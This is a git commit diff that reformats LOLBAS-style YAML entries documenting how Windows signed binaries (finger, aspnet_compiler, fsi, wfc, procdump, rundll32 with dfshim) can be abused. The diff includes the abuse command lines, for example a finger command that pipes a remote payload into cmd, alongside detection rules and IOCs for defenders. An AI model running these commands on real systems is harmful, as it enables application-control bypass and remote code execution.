Fixing file formating.

2024-12-27 23:37:58 +01:00 · 2022-09-11 01:33:36 -04:00 · 2022-09-11 01:33:36 -04:00 · 654cdd2d61
commit 654cdd2d61
parent 3d6a4be2a5
9 changed files with 239 additions and 239 deletions
--- a/yml/OSBinaries/.AppInstaller.yml.swp
+++ b/yml/OSBinaries/.AppInstaller.yml.swp
--- a/yml/OSBinaries/Aspnet_Compiler.yml
+++ b/yml/OSBinaries/Aspnet_Compiler.yml
@ -1,27 +1,27 @@
---
-Name: Aspnet_Compiler.exe
-Description: ASP.NET Compilation Tool
-Author: Jimmy (@bohops)
-Created: 2021-09-26
-Commands:
-  - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
-    Description: Execute C# code with the Build Provider and proper folder structure in place.
-    Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
-    Category: AWL Bypass
-    Privileges: User
-    MitreID: T1127
-    OperatingSystem: Windows 10
-Full_Path:
-  - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
-  - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
-Code_Sample:
-  - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
-Detection:
-  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml
-Resources:
-  - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
-  - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
-Acknowledgement:
-  - Person: cpl
-    Handle: '@cpl3h'
+---
+Name: Aspnet_Compiler.exe
+Description: ASP.NET Compilation Tool
+Author: Jimmy (@bohops)
+Created: 2021-09-26
+Commands:
+  - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
+    Description: Execute C# code with the Build Provider and proper folder structure in place.
+    Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
+  - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
+Code_Sample:
+  - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
+Detection:
+  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml
+Resources:
+  - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
+  - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
+Acknowledgement:
+  - Person: cpl
+    Handle: '@cpl3h'
--- a/yml/OSBinaries/Finger.yml
+++ b/yml/OSBinaries/Finger.yml
@ -1,30 +1,30 @@
---
-Name: Finger.exe
-Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
-Author: Ruben Revuelta
-Created: 2021-08-30
-Commands:
-  - Command: finger user@example.host.com | more +2 | cmd
-    Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
-    Usecase: Download malicious payload
-    Category: Download
-    Privileges: User
-    MitreID: T1105
-    OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
-Full_Path:
-  - Path: c:\windows\system32\finger.exe
-  - Path: c:\windows\syswow64\finger.exe
-Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
-  - IOC: finger.exe should not be run on a normal workstation.
-  - IOC: finger.exe connecting to external resources.
-Resources:
-  - Link: https://twitter.com/DissectMalware/status/997340270273409024
-  - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
-Acknowledgement:
-  - Person: Ruben Revuelta (MAPFRE CERT)
-    Handle: '@rubn_RB'
-  - Person: Jose A. Jimenez (MAPFRE CERT)
-    Handle: '@Ocelotty6669'
-  - Person: Malwrologist
-    Handle: '@DissectMalware'
+---
+Name: Finger.exe
+Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
+Author: Ruben Revuelta
+Created: 2021-08-30
+Commands:
+  - Command: finger user@example.host.com | more +2 | cmd
+    Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
+    Usecase: Download malicious payload
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
+Full_Path:
+  - Path: c:\windows\system32\finger.exe
+  - Path: c:\windows\syswow64\finger.exe
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
+  - IOC: finger.exe should not be run on a normal workstation.
+  - IOC: finger.exe connecting to external resources.
+Resources:
+  - Link: https://twitter.com/DissectMalware/status/997340270273409024
+  - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
+Acknowledgement:
+  - Person: Ruben Revuelta (MAPFRE CERT)
+    Handle: '@rubn_RB'
+  - Person: Jose A. Jimenez (MAPFRE CERT)
+    Handle: '@Ocelotty6669'
+  - Person: Malwrologist
+    Handle: '@DissectMalware'
--- a/yml/OSLibraries/Dfshim.yml
+++ b/yml/OSLibraries/Dfshim.yml
@ -1,28 +1,28 @@
---
-Name: Dfshim.dll
-Description: ClickOnce engine in Windows used by .NET
-Author: 'Oddvar Moe'
-Created: 2018-05-25
-Commands:
-  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
-    Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
-    Usecase: Use binary to bypass Application whitelisting
-    Category: AWL Bypass
-    Privileges: User
-    MitreID: T1127
-    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full_Path:
-  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
-  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
-  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
-  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
-Code_Sample:
-  - Code:
-Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
-Resources:
-  - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
-  - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
-Acknowledgement:
-  - Person: Casey Smith
-    Handle: '@subtee'
+---
+Name: Dfshim.dll
+Description: ClickOnce engine in Windows used by .NET
+Author: 'Oddvar Moe'
+Created: 2018-05-25
+Commands:
+  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
+    Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
+    Usecase: Use binary to bypass Application whitelisting
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
+  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
+  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
+  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
+Code_Sample:
+  - Code:
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
+Resources:
+  - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
+  - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
+Acknowledgement:
+  - Person: Casey Smith
+    Handle: '@subtee'
--- a/yml/OSScripts/CL_LoadAssembly.yml
+++ b/yml/OSScripts/CL_LoadAssembly.yml
@ -1,24 +1,24 @@
---
-Name: CL_LoadAssembly.ps1
-Description: PowerShell Diagnostic Script
-Author: Jimmy (@bohops)
-Created: 2021-09-26
-Commands:
-  - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'
-    Description: Proxy execute Managed DLL with PowerShell
-    Usecase: Execute proxied payload with Microsoft signed binary
-    Category: Execute
-    Privileges: User
-    MitreID: T1216
-    OperatingSystem: Windows 10 21H1 (likely other versions as well)
-Full_Path:
-  - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
-Code_Sample:
-  - Code:
-Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml
-Resources:
-  - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
-Acknowledgement:
-  - Person: Jimmy
-    Handle: '@bohops'
+---
+Name: CL_LoadAssembly.ps1
+Description: PowerShell Diagnostic Script
+Author: Jimmy (@bohops)
+Created: 2021-09-26
+Commands:
+  - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'
+    Description: Proxy execute Managed DLL with PowerShell
+    Usecase: Execute proxied payload with Microsoft signed binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    OperatingSystem: Windows 10 21H1 (likely other versions as well)
+Full_Path:
+  - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
+Code_Sample:
+  - Code:
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml
+Resources:
+  - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
+Acknowledgement:
+  - Person: Jimmy
+    Handle: '@bohops'
--- a/yml/OtherMSBinaries/Fsi.yml
+++ b/yml/OtherMSBinaries/Fsi.yml
@ -1,38 +1,38 @@
---
-Name: Fsi.exe
-Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
-Author: Jimmy (@bohops)
-Created: 2021-09-26
-Commands:
-  - Command: fsi.exe c:\path\to\test.fsscript
-    Description: Execute F# code via script file
-    Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
-    Category: AWL Bypass
-    Privileges: User
-    MitreID: T1059
-    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
-  - Command: fsi.exe
-    Description: Execute F# code via interactive command line
-    Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
-    Category: AWL Bypass
-    Privileges: User
-    MitreID: T1059
-    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
-Full_Path:
-  - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
-  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
-Code_Sample:
-  - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
-Detection:
-  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
-  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
-  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
-  - IOC: Fsi.exe execution may be suspicious on non-developer machines
-Resources:
-  - Link: https://twitter.com/NickTyrer/status/904273264385589248
-  - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
-Acknowledgement:
-  - Person: Nick Tyrer
-    Handle: '@NickTyrer'
-  - Person: Jimmy
-    Handle: '@bohops'
+---
+Name: Fsi.exe
+Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
+Author: Jimmy (@bohops)
+Created: 2021-09-26
+Commands:
+  - Command: fsi.exe c:\path\to\test.fsscript
+    Description: Execute F# code via script file
+    Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1059
+    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+  - Command: fsi.exe
+    Description: Execute F# code via interactive command line
+    Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1059
+    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+Full_Path:
+  - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
+Code_Sample:
+  - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
+Detection:
+  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
+  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - IOC: Fsi.exe execution may be suspicious on non-developer machines
+Resources:
+  - Link: https://twitter.com/NickTyrer/status/904273264385589248
+  - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
+Acknowledgement:
+  - Person: Nick Tyrer
+    Handle: '@NickTyrer'
+  - Person: Jimmy
+    Handle: '@bohops'
--- a/yml/OtherMSBinaries/Procdump.yml
+++ b/yml/OtherMSBinaries/Procdump.yml
@ -1,35 +1,35 @@
---
-Name: Procdump(64).exe
-Description: SysInternals Memory Dump Tool
-Author: 'Alfie Champion (@ajpc500)'
-Created: '2020-10-14'
-Commands:
-  - Command: procdump.exe -md calc.dll explorer.exe
-    Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.
-    Usecase: Performs execution of unsigned DLL.
-    Category: Execute
-    Privileges: User
-    MitreID: T1202
-    OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
-  - Command: procdump.exe -md calc.dll foobar
-    Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
-    Usecase: Performs execution of unsigned DLL.
-    Category: Execute
-    Privileges: User
-    MitreID: T1202
-    OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
-Full_Path:
-  - Path: no default
-Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml
-  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml
-  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
-  - IOC: Process creation with given '-md' parameter
-  - IOC: Anomalous child processes of procdump
-  - IOC: Unsigned DLL load via procdump.exe or procdump64.exe
-Resources:
-  - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20
-Acknowledgement:
-  - Person: Alfie Champion
-    Handle: '@ajpc500'
+---
+Name: Procdump(64).exe
+Description: SysInternals Memory Dump Tool
+Author: 'Alfie Champion (@ajpc500)'
+Created: '2020-10-14'
+Commands:
+  - Command: procdump.exe -md calc.dll explorer.exe
+    Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.
+    Usecase: Performs execution of unsigned DLL.
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
+  - Command: procdump.exe -md calc.dll foobar
+    Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
+    Usecase: Performs execution of unsigned DLL.
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
+Full_Path:
+  - Path: no default
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml
+  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
+  - IOC: Process creation with given '-md' parameter
+  - IOC: Anomalous child processes of procdump
+  - IOC: Unsigned DLL load via procdump.exe or procdump64.exe
+Resources:
+  - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20
+Acknowledgement:
+  - Person: Alfie Champion
+    Handle: '@ajpc500'
--- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
+++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
@ -1,30 +1,30 @@
---
-Name: VisualUiaVerifyNative.exe
-Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
-Author: Jimmy (@bohops)
-Created: 2021-09-26
-Commands:
-  - Command: VisualUiaVerifyNative.exe
-    Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
-    Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
-    Category: AWL Bypass
-    Privileges: User
-    MitreID: T1218
-    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
-Full_Path:
-  - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
-  - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
-  - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
-Code_Sample:
-  - Code:
-Detection:
-  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
-  - IOC: As a Windows SDK binary, execution on a system may be suspicious
-Resources:
-  - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
-  - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
-Acknowledgement:
-  - Person: Lee Christensen
-    Handle: '@tifkin'
-  - Person: Jimmy
-    Handle: '@bohops'
+---
+Name: VisualUiaVerifyNative.exe
+Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
+Author: Jimmy (@bohops)
+Created: 2021-09-26
+Commands:
+  - Command: VisualUiaVerifyNative.exe
+    Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
+    Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+Full_Path:
+  - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
+  - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
+  - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
+Code_Sample:
+  - Code:
+Detection:
+  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - IOC: As a Windows SDK binary, execution on a system may be suspicious
+Resources:
+  - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
+  - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
+Acknowledgement:
+  - Person: Lee Christensen
+    Handle: '@tifkin'
+  - Person: Jimmy
+    Handle: '@bohops'
--- a/yml/OtherMSBinaries/Wfc.yml
+++ b/yml/OtherMSBinaries/Wfc.yml
@ -1,27 +1,27 @@
---
-Name: Wfc.exe
-Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
-Author: Jimmy (@bohops)
-Created: 2021-09-26
-Commands:
-  - Command: wfc.exe c:\path\to\test.xoml
-    Description: Execute arbitrary C# code embedded in a XOML file.
-    Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
-    Category: AWL Bypass
-    Privileges: User
-    MitreID: T1127
-    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
-Full_Path:
-  - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
-Code_Sample:
-  - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
-Detection:
-  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
-  - IOC: As a Windows SDK binary, execution on a system may be suspicious
-Resources:
-  - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
-Acknowledgement:
-  - Person: Matt Graeber
-    Handle: '@mattifestation'
-  - Person: Jimmy
-    Handle: '@bohops'
+---
+Name: Wfc.exe
+Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
+Author: Jimmy (@bohops)
+Created: 2021-09-26
+Commands:
+  - Command: wfc.exe c:\path\to\test.xoml
+    Description: Execute arbitrary C# code embedded in a XOML file.
+    Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
+Code_Sample:
+  - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
+Detection:
+  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - IOC: As a Windows SDK binary, execution on a system may be suspicious
+Resources:
+  - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
+Acknowledgement:
+  - Person: Matt Graeber
+    Handle: '@mattifestation'
+  - Person: Jimmy
+    Handle: '@bohops'